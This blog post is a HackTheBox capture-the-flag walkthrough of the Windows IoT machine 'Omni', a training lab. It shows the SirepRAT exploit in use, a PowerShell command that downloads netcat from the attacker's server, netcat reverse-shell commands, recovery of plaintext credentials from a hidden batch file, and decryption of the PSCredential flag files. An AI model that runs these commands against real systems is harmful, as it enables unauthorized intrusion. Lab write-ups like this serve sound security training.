HackTheBox Omni Writeup – 10.10.10.204

Hello and welcome back to Nav1n’s writeup, HackTheBox Omni (10.10.10.204) is a new IoT box released by HackTheBox on 22nd August. The easy machine based on an IoT exploit made by egre55.

Initial foothold stars with finding correct PoC of Window IoT exploit. Gaining the reverse shell using the exploit and from there taking it further to finding an uncommon volume where the users are present. It couldn’t be more easy to find both user and Root flag, however the flags are actually encrypted.

From there finding a hidden file which contains credentials of Administrator and another user called App. Then logging to the portal using the creds just found. Creating another round of reverse shell using a built-in command shell in the portal and decrypting flag files using PowerShell Clixml and GetNetwordCredential to get real flags.

HackTheBox Omni Writeup

Enumeration

As always, the machine IP goes to my hosts file and I start with NMAP scanning. The NMAP result says the following.

PORT     STATE SERVICE VERSION
135/tcp  open  msrpc   Microsoft Windows RPC
8080/tcp open  upnp    Microsoft IIS httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.

There are two ports open, Microsoft Windows RPC on 135 and Windows IIS on 8080. Visiting http://omni.htb:8080 requests for authentication with the site name “Windows Device Portal”.

A quick Google search shows, The Windows Device Portal (WDP) lets user configure and manage device remotely over the local network. So this hints the IoT probably based on the Windows. As per the documentation, I tried the default credentials Administrator:p@ssw0rd didn’t work.

Doing some research I found an article (Raspberry Pi devices can be hijacked via Windows IoT hack) that says some windows operating system based IoTs can be exploited using a flaw with its Sirep/WPCon communications protocol. The vulnerability was discovered by a security researcher Dor Azouri. The researcher also built an example of the tool, a remote access Trojan SirepRAT, which is now available on GitHub.

The SirepRAT

So confirming the SirepRAT works, I decided to test it. Cloned the SirepRAT to my Kali machine’s Omni working directory.

root@nav1n:~/htb/omni # git clone https://github.com/SafeBreach-Labs/SirepRAT.git                                                                                                                                                        128 ↵
Cloning into 'SirepRAT'...
remote: Enumerating objects: 61, done.
remote: Total 61 (delta 0), reused 0 (delta 0), pack-reused 61
Unpacking objects: 100% (61/61), 5.58 MiB | 1.49 MiB/s, done.
root@nav1n:~/htb/omni # 

Available Commands:

available commands:
*	LaunchCommandWithOutput
*	PutFileOnDevice
*	GetFileFromDevice
*	GetSystemInformationFromDevice
*	GetFileInformationFromDevice

I run a couple of commands to make sure it works as per the documentation.

root@nav1n:~/htb/omni/SirepRAT(master) # python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<OutputStreamResult | type: 11, payload length: 30, payload peek: 'C:\Data\Users\DefaultAccount'>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: ''>
root@nav1n:~/htb/omni/SirepRAT(master) # 

Looking for current user:

root@nav1n:~/htb/omni/SirepRAT(master) # python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<OutputStreamResult | type: 11, payload length: 22, payload peek: 'C:\Data\Users\System'>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: ''>
root@nav1n:~/htb/omni/SirepRAT(master) # 

Going further, the host name is found: Omni

root@nav1n:~/htb/omni/SirepRAT(master) # python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe" --v
---------
omni
---------

The Reverse Shell

The SirepRAT ca use PowerShell arguments. So the PowerShell command “Invoke-Webrequest” to import NetCat binary in to the Omni and execute and get the reverse shell as system.

Steps:

  • Host a PythonSimpleHTTPServer
  • Run a listener
  • Copy NetCar windows exe to the webserver directory
  • Run the argument:
--args "/c powershell.exe Invoke-Webrequest -OutFile C:\temp\nc64.exe -Uri http://10.10.14.21:8000/nc64.exe"

This will import the netcat to \temp\ directory so this can be executed without fearing triggering UAC.

Now that the HTTPserver confirmed the NetCat was successfully served to the machine Omni, next, I need to execute it so my listener get the revere shell.

Let us do it.

The command is simple, the new argument is: –args “/c C:\Windows\temp\nc64.exe 10.10.14.21 9999 -e cmd.exe” will give us a reverse shell in the listener.

Enumerating further, a noticed there is only a Public user in the system, this cant be true, the IOT users are on another drive.

C:\Users>dir
dir
 Volume in drive C is MainOS
 Volume Serial Number is 3C37-C677

 Directory of C:\Users

10/26/2018  11:37 PM    <DIR>          .
10/26/2018  11:37 PM    <DIR>          ..
10/26/2018  11:37 PM    <DIR>          Public
               0 File(s)              0 bytes
               3 Dir(s)     574,689,280 bytes free

Running wmic I noticed several volumes attached to the system, C:, D: and U:

C:\>wmic logicaldisk get deviceid, volumename, description
wmic logicaldisk get deviceid, volumename, description
Description                   = Local Fixed Disk
DeviceID                      = C:
VolumeName                    = MainOS
Description                   = CD-ROM Disc
DeviceID                      = D:
VolumeName                    = 
DeviceID                      = U:
VolumeName                    = Data

So reading D:, got an error “The device is not ready.”, but U: seem to have something interesting.

Listing Users in the U: drive I found Administrator, App, DevToolUser, Public and System accounts.

U:\Users>dir
dir
 Volume in drive U is Data
 Volume Serial Number is 6A37-E09E

 Directory of U:\Users

08/23/2020  10:05 PM    <DIR>          .
08/23/2020  10:05 PM    <DIR>          ..
07/04/2020  09:48 PM    <DIR>          administrator
07/04/2020  09:53 PM    <DIR>          app
07/03/2020  11:22 PM    <DIR>          DefaultAccount
08/24/2020  07:59 AM    <DIR>          DevToolsUser
08/15/2020  05:38 PM            45,272 nc64.exe
08/24/2020  09:05 AM    <DIR>          Public
07/04/2020  10:29 PM    <DIR>          System
               1 File(s)         45,272 bytes
               8 Dir(s)   4,690,460,672 bytes free

U:\Users>

Weirdly, I was able to access both Administrator and users and was able to read root.txt and user.txt, but both flags doesn’t seem like flags. Looking closer it’s an encrypted password generated using PowerShell System Management Automation PSCredential. This is the way how PowerShell stores credentials.

Administrator

01000000d08c9ddf0115d1118c7a00c04fc297eb0100000011d9a9af9398c648be30a7dd764d1f3a000000000200000000001066000000010000200000004f4016524600b3914d83c0f88322cbed77ed3e3477dfdc9df1a2a5822021439b000000000e8000000002000020000000dd198d09b343e3b6fcb9900b77eb64372126aea207594bbe5bb76bf6ac5b57f4500000002e94c4a2d8f0079b37b33a75c6ca83efadabe077816aa2221ff887feb2aa08500f3cf8d8c5b445ba2815c5e9424926fca73fb4462a6a706406e3fc0d148b798c71052fc82db4c4be29ca8f78f0233464400000008537cfaacb6f689ea353aa5b44592cd4963acbf5c2418c31a49bb5c0e76fcc3692adc330a85e8d8d856b62f35d8692437c2f1b40ebbf5971cd260f738dada1a7

User App

01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7

A Story Of a Hidden File

There is a bat file which is hidden and buried somewhere in the c:, this was a hint I was given, so I decided to try my luck with PowerShell command to pull every “bat” file. Running the PowerShell Get-Childitem command to search files including *dat* in their name I got the following result (Note: I snipped the long result).

C:\>powershell.exe
powershell.exe
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\> Get-Childitem –Path C:\ -Include *bat* -File -Recurse -ErrorAction SilentlyContinue -force
Get-Childitem –Path C:\ -Include *bat* -File -Recurse -ErrorAction SilentlyContinue -force
    Directory: C:\Program Files\WindowsPowerShell\Modules\PackageManagement
Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
-a-h--        8/21/2020  12:56 PM            247 r.bat                         
    Directory: C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin
Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
-a----       10/26/2018  11:36 PM            925 Pester.bat                    
    Directory: C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0
Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
-a----       10/26/2018  11:36 PM            744 Build.bat                     
    Directory: C:\test
Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
-a----        6/11/2020   7:43 AM          32976 winPEAS.bat                   
PS C:\> 

Lucky, the first file r.bat is the one I’m looking for, the file contains credentials for Administrator as well as user App.

The content:

type r.bat
@echo off
:LOOP
for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete
net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz
ping -n 3 127.0.0.1
cls
GOTO :LOOP
:EXIT

The bat file seems to cleaning local administrator group members. Well, doesn’t matter, we now have the credentials. Testing the App user credential (app:mesh5143) I successfully logged into the portal.

Looking around, there is a Run command. This allows us to run command as user on the Omni machine. Trying the credentials of Administrator I was as well able to login to the portal.

Lets make a reverse shell

So running another listener and running the command from the App, I got reverse shell as App.

c:\Windows\temp\nc64.exe 10.10.14.21 9988 -e powershell.exe

Now as App user, I can import the serialized file and recreate an object using Import-Clixml. Import-Clixml returns object that were deserialized from the stored XML files.

Let us import a CLIXML file and PowerShell object using below command. In over case the file is txt instead XML, so we just need to change the extension from XML to TXT.

$Processes = Import-Clixml -Path .\pi.xml

Once the above line is executed, we need to decrypt PowerShell secure string password. So decrypting can be done using following command:

PS C:> $credential.GetNetworkCredential().password 

So, doing it all together we can decrypt the string. From the user App shell, let us decrypt the flag.

User.txt

PS C:\windows\system32> $credential = Import-CliXml -Path U:\Users\app\user.txt
$credential = Import-CliXml -Path U:\Users\app\user.txt
PS C:\windows\system32> $credential.GetNetworkCredential().Password
$credential.GetNetworkCredential().Password
7cfd50f6bc34db3204898f1505ad9d70
PS C:\windows\system32> 

As we now have user flag, lets us go back to http://omni.htb:8080 and login using Administrator credentials (administrator:_1nt3rn37ofTh1nGz) .

Run the command again

c:\Windows\temp\nc64.exe 10.10.14.21 9988 -e powershell.exe

This will initiate the netcat reverse shell as Administrator. let us run the same commands as user App against the Root flag and get the root flag decrypted.

Roor.txt

PS C:\windows\system32> $credential = Import-CliXml -Path U:\Users\administrator\root.txt
$credential = Import-CliXml -Path U:\Users\administrator\root.txt
PS C:\windows\system32> $credential.GetNetworkCredential().Password
$credential.GetNetworkCredential().Password
5dbdce5569e2c4708617c0ce6e9bf11d
PS C:\windows\system32> 

That’s all. Thank you for being a loyal reader. See you soon.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

View all posts by Navin →
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
Sorry, that action is blocked.